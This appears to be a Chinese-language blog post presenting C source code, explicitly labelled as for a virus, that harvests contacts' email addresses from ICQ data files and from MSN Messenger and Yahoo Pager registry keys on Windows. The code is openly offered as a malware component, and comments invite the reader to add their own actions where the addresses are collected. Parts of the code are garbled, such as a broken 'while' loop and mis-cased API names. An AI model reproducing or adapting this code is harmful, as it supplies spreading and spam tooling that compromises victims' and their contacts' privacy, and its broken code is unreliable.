naoga

病毒的e-mail地址收集方法源代码

一、ICQ的e-mail地址收集
void find_icq_address()
{
HANDLE hF1;
WIN32_FIND_DATA f;
HANDLE hFind;
BYTE uin[MAX_PATH],dbpath[MAX_PATH];
DWORD size;
HKEY hkeyresult;
char datafname[MAX_PATH], fn[50];size=800;
LONG l1=RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )"Software\\Mirabilis\\ICQ\\DefaultPrefs" ,0,KEY_ALL_ACCESS, &hkeyresult );
if(l1!=ERROR_SUCCESS) return ;
RegQueryvalueEx ( hkeyresult, ( LPCTSTR )"UIN Dir" , 0, 0, uin, &size ) ;size=800;
RegQueryvalueEx ( hkeyresult, ( LPCTSTR )"ICQPath" , 0, 0, dbpath, &size ) ;
RegCloseKey(hkeyresult);
SetCurrentDirectory((char *)uin);
hFind = FindFirstFile("*.uin", &f);
if (hFind == INVALID_HANDLE_value){ FindClose(hFind); return ;}
FindClose(hFind);
strcpy(fn,f.cFileName );
fn[lstrlen(fn)-3]='d';fn[lstrlen(fn)-2]='a';fn[lstrlen(fn)-1]='t';
if(!(dbpath[lstrlen((char *)dbpath)-1]=='\\')) lstrcat((char *)dbpath,"\\");
char *pb[6]={"2000b","2001a","2001b","2002a","2002b",};
for (int cc=0;cc<5;cc++){
wsprintf(datafname,"%s%s\\%s",(char *)dbpath,pb[cc],fn);
hFind = FindFirstFile(datafname, &f);
if (hFind != INVALID_HANDLE_value){ FindClose(hFind); goto RR; }
FindClose(hFind);
}
return;
RR:
//////////////
char eid[3000][50];int cnt=0;
hF1= CreateFile (datafname,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if (hF1==NULL) return ;
size=GetFileSize(hF1,NULL);
char *buffer=NULL;
HANDLE hFMAP=CreateFileMapping(hF1,0,PAGE_READONLY,0,0,0);
if(!hFMAP) { CloseHandle(hF1); return ; }
buffer=(char *)MapViewOfFile(hFMAP,FILE_MAP_READ,0,0,0);
if(!buffer) { CloseHandle(hFMAP); CloseHandle(hF1); return ; }
char eID[250];eID[0]=0;DWORD i=0;
while(i{
if(!strncmp(buffer+i,"PrimaryEmail",strlen("PrimaryEmail"))) {
i+=16;
if(!validAddress(buffer+i )){ lstrcpy(eid[cnt],buffer+i);cnt++; }
}
else i++;
}

UnmapViewOfFile(buffer);
CloseHandle (hFMAP);
CloseHandle (hF1);
//EID[I]就是E-MAIL地址了!!
//我睡觉去了!!
return ;
}

二、.net MSN的e-mail地址收集
void find_msn_address()
{
char eid[1500][50];
HKEY hkeyresult1;
char name[250];
BYTE dat[250];
DWORD dw,dw1;
LONG l1,k;
int cnt=0;
l1=RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service",0,KEY_ALL_ACCESS, &hkeyresult1 );
if(l1==ERROR_SUCCESS){
dw=300;
dw1=REG_BINARY;
k=0;
dw=100;
dw1=REG_BINARY;
l1=ERROR_SUCCESS;
while(l1!=ERROR_NO_MORE_ITEMS){
l1=RegEnumvalue(hkeyresult1,k,name,&dw,0,&dw1,dat,&dw);
k++;
if(!validAddress((char *)dat)){
lstrcpy(eid[cnt],(char *)dat);
cnt++;
}
}
}
RegCloseKey(hkeyresult1);
//eid[i]里就是e-mail地址了!!
//你想干的事情——这里!
}

三、yahoo online软件的e-mail地址收集
void find_yahoo_address()
{
HKEY hkeyresult ,hkeyresult1;long i;char name[200],skey[100],chatn[200];
DWORD dw2,dw;FILETIME f;
if(RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )"Software\\Yahoo\\Pager\\profiles",0,KEY_ALL_ACCESS, &hkeyresult1 )!= ERROR_SUCCESS )
return ;
dw2=200;i=0;int j;
while(RegEnumKeyEx(hkeyresult1,i,name,&dw2,NULL,NULL,NULL,&f)!=ERROR_NO_MORE_ITEMS){
wsprintf(skey,"Software\\Yahoo\\Pager\\profiles\\%s\\IMVironments\\Recent",name);
if(RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )skey,0,KEY_ALL_ACCESS, &hkeyresult )!= ERROR_SUCCESS )
{
return ;
}
dw=200;j=0;
while(RegEnumvalue(hkeyresult,j,chatn,&dw,NULL,NULL,NULL,NULL)!=ERROR_NO_MORE_ITEMS)
{
*(strchr(chatn,';'))='\0';
if (strcmp(chatn,name)!=0){
lstrcat(chatn,"@yahoo.com");
if(!validAddress(chatn))
SendDlgItemMessage(hd,IDC_LIST2,LB_ADDSTRING,0,(LPARAM)chatn);
}
j++;dw=200;
}
RegCloseKey(hkeyresult);
i++;dw2=200;
}
RegCloseKey(hkeyresult1);
//yu~~~
//睡觉了!!
}   

评论